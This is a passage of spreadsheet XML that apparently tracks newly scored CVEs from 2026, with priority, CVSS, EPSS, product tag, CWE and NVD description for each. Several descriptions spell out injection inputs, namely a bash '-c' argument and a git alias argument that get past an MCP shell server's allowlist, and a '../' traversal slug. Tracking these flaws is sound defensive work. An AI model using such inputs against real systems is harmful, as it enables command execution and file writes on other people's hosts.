        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19633</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55509</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. Prior to 4.3.5, the sample MySQLBrowserProvider in wsgidav/samples/mysql_dav_provider.py concatenates the record key parsed from a request URL directly into SQL WHERE clauses. The affected _exists_record_by_primary_key, _get_field_by_primary_key, and _get_record_by_primary_key methods are part of a shipped example provider that is not enabled by default. An attacker who can access a share explicitly configured with this non-default provider can inject SQL through a normal GET request; anonymously exposed read shares permit a status-code oracle and extraction of arbitrary data reachable by the configured MySQL account. This issue is fixed in version 4.3.5.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55509</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79756</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.051</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, the fix for unauthenticated OS command injection in the nuclio dashboard on the local/Docker platform is incomplete. The fix added validateFunctionName for function names and common.Quote() for the named-resource shell command path, but the list-all resource path (triggered when no specific resource name is provided) still interpolates the resourceNamespace parameter unquoted into a /bin/sh -c command string. An unauthenticated attacker can inject shell metacharacters via the X-Nuclio-Function-Namespace, X-Nuclio-Project-Namespace, or X-Nuclio-Function-Event-Namespace HTTP headers to achieve arbitrary command execution inside the dashboard container. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79756</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50553</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, Note Mark validates book and note slug values with the OpenAPI/huma tag pattern:"[a-z0-9-]+". huma compiles this with regexp.MustCompile(s.Pattern) and tests it with patternRe.MatchString(str), an UNANCHORED match. Because the pattern is not anchored (^...$), any string that merely CONTAINS one [a-z0-9-] substring passes validation. A slug such as ../../../../../../tmp/escape is accepted and stored verbatim. The data-export CLI commands (note-mark migrate export and note-mark migrate export-v1) join these unsanitized slugs straight into the output path with path.Join / filepath.Join, then os.MkdirAll the directory and os.Create the note file. path.Join resolves the ../ segments, so the note content file is written OUTSIDE the configured export directory. The export process commonly runs as root (default in Docker / bare-metal admin usage), so this is a root-privilege arbitrary directory create + file write. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50553</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55848</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55848</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77775</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy lets a client choose the upstream destination with the x-headroom-base-url request header. _resolve_openai_upstream_base in headroom/proxy/handlers/openai.py accepts the header value, requires only that it parse with an http or https scheme and a hostname, and returns it for use as the upstream base; _select_passthrough_base_url in headroom/providers/proxy_routes.py reads the same header for the passthrough routes. No check rejects loopback, link-local, or RFC 1918 destinations, and because the component is a proxy the upstream response is returned to the caller, so the request reaches internal services and cloud metadata addresses and their responses are disclosed. The Authorization header accompanying the request is forwarded unchanged to the caller-designated host. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77775</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55581</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-183, CWE-78</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default Docker security.yaml includes /bin/bash in allowed_executables, while security.go validates only the first token and checkBlockedPatternsAndCommands does not reject the shell command-mode flag -c. A caller of the shell_exec MCP tool can provide the command argument `/bin/bash -c &lt;arbitrary-command&gt;`, which passes validation and reaches executor.go, where parseCommand and exec.CommandContext execute the arbitrary command as mcpuser outside the intended allowlist. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55581</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55582</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, the default security.yaml allows /usr/bin/git, while security.go omits ! from containsShellMetacharacters and containsDangerousShellConstructs and applies no per-executable argument policy. A caller of the shell_exec MCP tool can provide the command argument /usr/bin/git -c alias.pwn=!&lt;arbitrary-command&gt;, causing Git to create a shell alias and execute arbitrary OS commands as the mcp-shell process user. The default Docker image runs as mcpuser with Git installed and secure mode enabled, so the bypass is exploitable in the default deployment without additional authentication beyond MCP connectivity. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55582</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86242</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>reefs@jfrog.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>Bifrost HTTP transport before 2.0.0 accepts an enabled custom plugin whose path is an HTTP URL through unauthenticated POST /api/plugins when management authentication is disabled (the default, governance.auth_config.is_enabled=false). The shared-object loader treats an http-prefixed path as a download URL, writes the body to a temporary .so, and passes it to Go's plugin.Open. After a successful open, optional Init runs immediately with the supplied config as the Bifrost process user. On documented dynamically linked builds (DYNAMIC=1 / no static-link flags), which the vendor requires for custom Go plugins, plugin.Open is expected to succeed and this is unauthenticated remote code execution. On the published statically linked Docker image, plugin.Open fails with Dynamic loading not supported, so that build class is only server-side request forgery. Attack complexity is High because the attacker cannot force RCE on the default static image and a loadable plugin must match the host Go version, OS, architecture, and linkage. The 1.6.x HTTP transport line through 1.6.11 does not contain the fix.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86242</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52831</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.4, the Nuclio controller builds a curl invocation string for each cron trigger and stores it as the args of a Kubernetes CronJob container (/bin/sh, -c, &lt;command&gt;). Two fields in the trigger specification flow into this string without adequate sanitization: event.headers keys and event.body. This issue has been patched in version 1.16.4.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52831</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79755</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, on the Nuclio local Docker platform, the function namespace is interpolated—unvalidated—into a double-quoted docker ps --filter "label=nuclio.io/namespace=&lt;value&gt;" command that is executed via the host shell (/bin/sh -c). Because the default auth kind is nop (unauthenticated), a remote attacker can inject arbitrary OS commands that run as root inside the dashboard container, which holds the Docker socket → host compromise. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79755</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15140</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>psirt@purestorage.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>A privilege-escalation issue in the Portworx Operator when deployed on Red Hat OpenShift (OCP). Only under specific conditions during the initial provisioning of a Portworx storage cluster, a user holding only limited, namespace-scoped permissions could cause the operator to grant broader access than intended, potentially resulting in elevated privileges within the Kubernetes cluster.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15140</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54245</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.86.2, the Okta conditional access integration in Fleet Premium is vulnerable to SQL injection through a host-supplied value that is used in a database query without proper parameterization, allowing an attacker who controls a single enrolled host to read or modify arbitrary data in the Fleet database. The value is reported by the host's own agent and stored verbatim, then used on an unauthenticated request path that supports the conditional access integration, so any party controlling one enrolled host, the lowest-privilege position in the product, can influence the query. By disclosing arbitrary database contents an attacker can extract stored session tokens and replay them to act as a global administrator, and on a managed fleet that administrator access enables running scripts on enrolled hosts, leading to remote code execution. The issue requires Fleet Premium with the Okta conditional access integration enabled and does not affect instances where it is not configured. This issue is fixed in version 4.86.2.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54245</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63404</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-377</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the embedded Redis bootstrapper is vulnerable to an insecure temporary file flaw that lets a local unprivileged user hijack the Redis configuration and escalate to root. It writes its startup configuration to a fixed, predictable, world-writable path, /tmp/redis.conf, only creating the file if it does not already exist and never validating it on later boots. Because /tmp is world-writable, a local unprivileged user can pre-create /tmp/redis.conf with attacker-chosen Redis directives before Faktory starts, and Faktory will use the planted file verbatim. Faktory only overrides the unixsocket, dir, and logfile options, leaving directives such as bind, protected-mode, requirepass, and loadmodule attacker-controlled. This lets an attacker silently expose the entire job queue over an unauthenticated network port with no visible error to the administrator. Because the official systemd unit runs Faktory, and the redis-server child it spawns, as root, an attacker can also supply a loadmodule directive to execute arbitrary native code in the root-owned Redis process, escalating from a local unprivileged user to root. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63404</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79754</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. From version 1.6.19 to before version 1.17.2, Nuclio's Dashboard build pipeline does not sanitize the spec.build.tempDir field before using it to construct a shell command. When the Kaniko container builder is enabled, a user with function-create permission can inject shell metacharacters into this field and achieve arbitrary command execution inside the Dashboard container, which runs with a Kubernetes service account holding wildcard access to Secrets, Pods, Jobs, and Deployments in its namespace. This issue has been patched in version 1.17.2.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79754</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
